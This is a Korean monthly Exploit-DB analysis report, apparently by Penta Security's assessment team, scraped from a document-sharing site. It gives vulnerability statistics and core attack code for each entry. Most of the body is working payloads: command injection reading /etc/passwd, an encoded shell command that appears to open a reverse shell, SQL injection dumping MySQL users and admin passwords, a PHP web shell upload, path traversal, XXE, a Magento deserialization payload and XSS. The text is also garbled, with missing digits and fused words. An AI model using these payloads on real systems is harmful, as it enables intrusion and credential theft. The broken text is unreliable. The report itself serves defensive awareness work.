EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

Size: px

Start display at page:

Download "EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j"

서원 장
8 years ago
Views:

1 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. Cross Site Scripting 공격은일반적으로 Parameter Value 를이용여공격는방법입니다. 지만 월발견된공격들은 Key 값혹은특정 HTTP Header 의 Value 를노리는공격들이주로발견되었습니다. 이러한공격들은특정프로그램에서만발생되는취약점입니다. 해당프로그램을사용는관리자는취약점에노출된페이지를확인여소스코드의시큐어코딩이시급해보입니다. 또한 월은 과관련한다양한공격패턴들도발견되었습니다. 공격은취약한명령어또는함수를파라미터로이용여해당동작을바로실행시킬수있습니다. 따라서특별한경우를제외고는관련명령어나함수를사용지말것을권고합니다. 만약해당명령어와함수를반드시사용해야할경우라면, 입력값을검증는필터에파이프 ( ), 세미콜론 (;) 등멀티라인을지원는특수문자에대한검증을실시여해당함수에유해한값이전달되지못도록해야합니다. 관련취약점이발견된소프트웨어를사용는관리자는취약점이발견된페이지와파라미터를확인여다양한 공격에대한대비가필요해보입니다.. 취약점별보고개수취약점 보고개수 8 7 취약점별보고개수 7 Information Disclosure LFI 6 File Upload 3 SQL 7 XSS 9 총합계 Information Disclosure LFI File Upload SQL. 위험도별분류 위험도별분류 위험도 보고개수 백분율 6.90% 7.86% 7.4% 합계 % 3. 공격난이도별현황 공격난이도 보고개수 백분율 3.4% % 7.86% 총합계 % 공격난이도별현황 6 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager PHP Realestate Script Script PHP Imagick Magento extplorer FlatPress CakePHP SAP xmii 총합계 9 주요소프트웨어별취약점발생현황 4 Portal Webpy ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq - Multiple Vulnerabilities Open Source Script ManageEngine Applications Manager

2 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.jpg" cat /etc/passwd>a.txt" PHP Imagick PHP Imagick XSS < ipinfo.cgi XSS 취약점 /cgi-bin/ipinfo.cgi?<script>alert(/rxss-yann_cam_- _Security_Consultant_@ASafety_-_SYNETIS/)</script> < XSS Acunetix WP Security Plugin XSS 취약점 /wordpress/?s="><script>alert("johto.robbie"</script> Acunetix WP Security Acunetix WP Security Plugin 3.0. /cgibin/ipinfo.cgi?<script>eval(unescape("%76%6%7%0%68 %6%6%64%3D%64%6F%63%7%6D%6%6E%74%E%6 7%6%74%4%6C%6%6D%6%6E%74%73%4%79%4% 6%67%4E%6%6D%6%8%7%68%6%6%64%7%9% B%30%D%3B%76%6%7%0%73%63%7%69%70% XSS %3D%0%64%6F%63%7%6D%6%6E%74%E%63%7%6 < %6%74%6%4%6C%6%6D%6%6E%74%8%7%73% ipinfo.cgi XSS 취약점 () 63%7%69%70%74%7%9%3B%73%63%7%69%70%74% E%74%79%70%6%3D%0%7%74%6%78%74%F%6A <.9 0 %6%76%6%73%63%7%69%70%74%7%3B%73%63%7 %69%70%74%E%73%7%63%3D%0%7%68%74%74%70 %3A%F%F%3%39%3%E%3%36%38%E%3%3%33 %E%3%F%78%E%6A%73%7%3B%68%6%6%64%E %6%70%70%6%6E%64%43%68%69%6C%64%8%73%63 %7%69%70%74%9%3B%0A%09%09%09"))</script> POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/ < ipinfo.cgi 취약점 (3) <.9 0 NCSA_PASS= touch /tmp/x;#&ncsa_pass_confirm= touch /tmp/x;#&ncsa_username=yanncam&action=ajouter POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/ NCSA_PASS= eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu < MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI ipinfo.cgi pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi 취약점 (4) GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI <.9 0 CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\ \\\\\nihwmihm7ignsb3nlkgmpoyb9ih0gdhpb GUoYyAhPSAiZXhpdCIpIGNsb3NlKHMp\\\\\\\\n OyB9fScgLRldi9udWxs" openssl enc -a - d`;#&ncsa_pass_confirm= eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaWldC90Y3AvMC8xOTIu MTY4LjAuMi8xMzM3Ijsg\\\\\\\\ndhpbGUoNDI pihsgzg97ihbyaw0ziaichlbgw+iib8jibzoybzihwmi GdldGxp\\\\\\\\nbmUgYzsgaWYoYyl7IHdoaWxlI CgoYyB8JiBnZXRsaWlKSA+IDApIHByaW0ICQw\\\

3 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL ManageEngine Applications Manager Build downtimescheduler.do SQL 취약점 /downtimescheduler.do?method=viewmaintenancetask &taskid=- %0UNION%0ALL%0SELECT%0,,database(),4,, 6,7,8,9,0,,,3,4,%0-- ManageEngin e Applications Manager ManageEngin e Applications Manager Build createpdf.php 취약점 /createpdf.php?targeturl=ly4uly4uly4uly4uly4uly4uly4u Ly4uLV0Yy9wYXNzdQ=&&pay_id=4&&type=actual - Multiple Vulnerabilities XSS - createpdf.php XSS 취약점 () POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/ screen_name="><script><<imgimg SRC=oi onerror=javascript:alert()> POST /admin/default/pack_custom/test HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/ LFI Webpy.4. - pack_custom LFI 취약점 () Webpy Webpy.4. file=/etc/passwd SQL Web interface for DNSmasq / Mikrotik - dns.php SQL 취약점 /dns_dhcp/dns/dns.php?net=%0and%0(select%0 %0from(select%0count(*),concat((select%0(select% 0concat(0xb,host,0xb,user,0xb,password,0xb))%0 from%0mysql.user%0limit%0),floor(rand(0)*))x% 0from%0mysql.user%0group%0by%0x)a) DNSmasq Web interface for DNSmasq File Upload extplorer..9 - Archive Path POST / HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f extplorer extplorer dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" <?php exec($_get["cmd"]);?> dd009908f XSS CakePHP Framework /cake/cake3/ XSS 취약점 GET /cake/cake3/ HTTP/. CLIENT-IP: <script>alert('poc');</script> CakePHP CakePHP Framework XSS Webpy.4. - /admin/default/install_plugin/ XSS 취약점 /admin/default/install_plugin/test?plugin=mathpy&sourc e=javascript:alert() Webpy Webpy SAP xmii.0 - /XMII/ 취약점 /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../.. /../../../../../../../etc/passwd SAP xmii SAP xmii.0

4 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /rest/v/guest-carts/test/set-payment-information HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/ Content-Type: application/json Magento < Unauthenticated Arbitrary Unserialize -> Arbitrary Write File {"paymentmethod":{"method":"checkmo","additional_data": {"additional_information":"o:3:\\\\"credis_client\\\\" ::{s:8:\\\\"\\\\u0000*\\\\u0000redis\\\\";o:4: \\\\"Magento\\\\\\\\Sales\\\\\\\\Model\\\ \\\\\Order\\\\\\\\Payment\\\\\\\\Transactio n\\\\":40:{s:9:\\\\"\\\\u0000*\\\\u0000_order\ \\\";N;s::\\\\"\\\\u0000*\\\\u0000_parentTran saction\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_chi ldren\\\\";n;s::\\\\"\\\\u0000*\\\\u0000_iden tifiedchildren\\\\";n;s:7:\\\\"\\\\u0000*\\\\u00 00_transactionsAutoLinking\\\\";b:;s:4:\\\\"\\\\u 0000*\\\\u0000_isFailsafe\\\\";b:;s::\\\\"\\\\ u0000*\\\\u0000_haschild\\\\";n;s::\\\\"\\\\u 0000*\\\\u0000_eventPrefix\\\\";s:3:\\\\"sales_ord er_payment_transaction\\\\";s::\\\\"\\\\u0000*\ \\\u0000_eventobject\\\\";s::\\\\"order_payment Magento Magento < SQL.4. for XenForo - Multiple SQL s () /api.php?action=getgroup&value=' UNION ALL SELECT NULL%CNULL%CNULL%CNULL%CNULL%CCONC AT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo SQL.4. for XenForo - Multiple SQL s /api.php?action=getusers&value=' UNION ALL SELECT CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3.4. for XenForo Information Disclosure AfterLogic WebMail Pro ASP.NET Administrator Account Disclosure via XXE /spellcheck.aspx?xml=<?xml version=".0" encoding="utf- 8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM " %remote; %int; %trick;]> AfterLogic WebMail AfterLogic WebMail Pro ASP.NET File Upload Portal 4. - File Upload () POST /upload.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f Portal Portal dd009908f Content-Disposition: form-data; name="file"; filename="test.php" <? phpinfo();?> dd009908f SQL EduSec SQL /student/stumaster/view?id=%0union%0select%0,load_file( %7/etc/passwd%7),3,4,,6,7,8,9,0,,,3,4,, 6,7,8-- EduSec EduSec XSS Portal 4. - XSS () /index.php?title=onmousemove=alert() Portal Portal SQL PHP Realestate Script Script SQL /single.php?view_id=- 7+/*!0000union*/+select+,,user_name,4,,6,7,8,pa ssword,0,,,3,4,,6,7,8,9,0,,,3,4,,6+from+admin_login PHP Realestate Script Script PHP Realestate Script Script SQL Open Source Script SQL /contact_view.php?contact=- 7%7+/*!0000union*/+select+,,3,4,,6,7,8,9, 0,,0,3,4,,6,7,8,9,0,username,,password, 4,,6,7,8,9,30,3,3,33,34,3,36,37+/*!0000fr om*/+/*!0000admin_login*/%3 Open Source Script Open Source Script 3.6.0

5 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 XSS POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker Chrome/ /sysworkflow/en/neoclassic/pro cessproxy/saveprocess XSS 취약 점 PRO_TITLE=AA<img src=x onerror=alert()>a&pro_description=bbb&pro_cate GORY= ProcessMaker ProcessMaker LFI NanoStation M.6-beta - scr.cgi LFI 취약점 /scr.cgi?fname=../../../../../etc/passwd%00&status= NanoStation M.6-bet File Upload FlatPress admin.php File Upload 취약점 POST /flatpress/admin.php?p=uploader&action=default HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f dd009908f Content-Disposition: form-data; name="upload[]"; filename="test.php" FlatPress FlatPress.0.3 <? phpinfo();?> dd009908f XSS POST /sysworkflow/en/neoclassic/processes/processeslist HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW64 ProcessMaker Chrome/ /sysworkflow/en/neoclassic/pro cesses/processeslist XSS 취약점 # ProcessMaker ProcessMaker processname=<img src=x onerror=alert();>&start=0&limit=&category=%3creset %3E= NanoStation M.6-beta /scr.cgi?fname=rc.poststart.sh;cat%0/etc/hosts%00&status - scr.cgi 취 = 약점 NanoStation M.6-bet

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection